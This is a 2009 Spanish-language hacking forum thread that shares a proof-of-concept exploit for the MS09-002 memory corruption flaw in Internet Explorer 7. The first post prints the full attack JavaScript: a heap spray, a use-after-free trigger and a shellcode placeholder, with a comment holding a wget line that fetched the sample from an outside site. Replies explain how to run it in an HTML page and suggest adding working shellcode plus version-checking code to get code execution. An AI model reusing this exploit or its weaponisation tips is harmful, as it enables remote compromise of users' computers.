elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:46  


Tema destacado: Nueva página de elhacker.net en Google+ Google+

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Microsoft Internet Explorer 7 (Prueba de Corrupción de memoria)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft Internet Explorer 7 (Prueba de Corrupción de memoria)  (Leído 2,024 veces)
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Microsoft Internet Explorer 7 (Prueba de Corrupción de memoria)
« en: 2 Marzo 2009, 01:00 »

Una prueba de la falla de Internet Explorer 7 que puede causar la corrupción de la memoria en forma remota:

Código
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
 
took a little but found it. /str0ke
-->
 
<script language="javascript">
 
var c="putyourshizhere-unescaped";
 
var array = new Array();
 
var ls = 0x100000-(c.length*2+0x01020);
 
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
 
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
 
CollectGarbage();
 
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
 
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
 
<!-- milw0rm.com [2009-02-18] -->
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
R-Q-X

Desconectado Desconectado

Mensajes: 43



Ver Perfil
Re: Microsoft Internet Explorer 7 (Prueba de Corrupción de memoria)
« Respuesta #1 en: 2 Marzo 2009, 21:28 »

Disculpa mi falta de conosimiento pero como se utiliza ese exploit... la vdd uso los q estan en c y en perl. los de javascript y python nose como utilizarlos:S

DEsde ya gracias..

PD: Uso ubuntu
En línea

Que fue lo mas inteligente que salio de la boca de una mujer?
la p*j* de A.Einstein
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.239


Yo que tu lo pienso dos veces


Ver Perfil
Re: Microsoft Internet Explorer 7 (Prueba de Corrupción de memoria)
« Respuesta #2 en: 3 Marzo 2009, 13:25 »

Si es un javascript como POC de alguna vulnerabilidad en algún navegador, entonces debes de crear un documento html para abrirlo con este  :P

Código
<HTML>
<HEAD>
<TITLE>Exploit</TITLE>
</HEAD>
<BODY>
<!-- El code javascript aqui -->
</BODY>
</HTML>

Salta la alerta de control ActiveX, pero al aceptar :P


SO Win XP SP2, IE7 Versión: 7.0.5730.11

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Microsoft Internet Explorer 7 (Prueba de Corrupción de memoria)
« Respuesta #3 en: 3 Marzo 2009, 15:24 »

Hola que ta tal, el alert sale por que estas en local (Me refiero a que lo estas abriendo como file://), si lo tubieses en algun servidor como apache no se veria, al menos que tubieses no script si seria bloqueado.

Saludos
En línea

Bien Super Divertido
@wifigdlmx
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Microsoft Internet Explorer 7 (Prueba de Corrupción de memoria)
« Respuesta #4 en: 3 Marzo 2009, 20:52 »

Es cierto lo quer dijo anon, además lo mas probable es que la shellcode que se puso ahi no funcione para tu sistema y por eso solamente escapa con un error del drwatson, si le pones una shell que se adecue a tu makina entonces podrás hacer ejecución. Talves no sería mala idea hacer un javascript que verifique la versión del sistema y lanzar esas shellcodes universales que andan por ahi.
En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
R-Q-X

Desconectado Desconectado

Mensajes: 43



Ver Perfil
Re: Microsoft Internet Explorer 7 (Prueba de Corrupción de memoria)
« Respuesta #5 en: 3 Marzo 2009, 22:11 »

Gracias por tomarte el tiempo de explicarme Novlucker.

En línea

Que fue lo mas inteligente que salio de la boca de una mujer?
la p*j* de A.Einstein
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Siete maneras de crear un Internet descentralizado a prueba de gobiernos
Noticias
wolfbcn 0 1,281 Último mensaje 2 Febrero 2011, 02:09
por wolfbcn
Internet afecta a la memoria
Noticias
wolfbcn 2 1,174 Último mensaje 16 Julio 2011, 13:15
por Randomize
Corrupción de memoria en C++ al pasar una variable
Programación C/C++
egyware 4 341 Último mensaje 27 Noviembre 2011, 17:39
por Eternal Idol
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines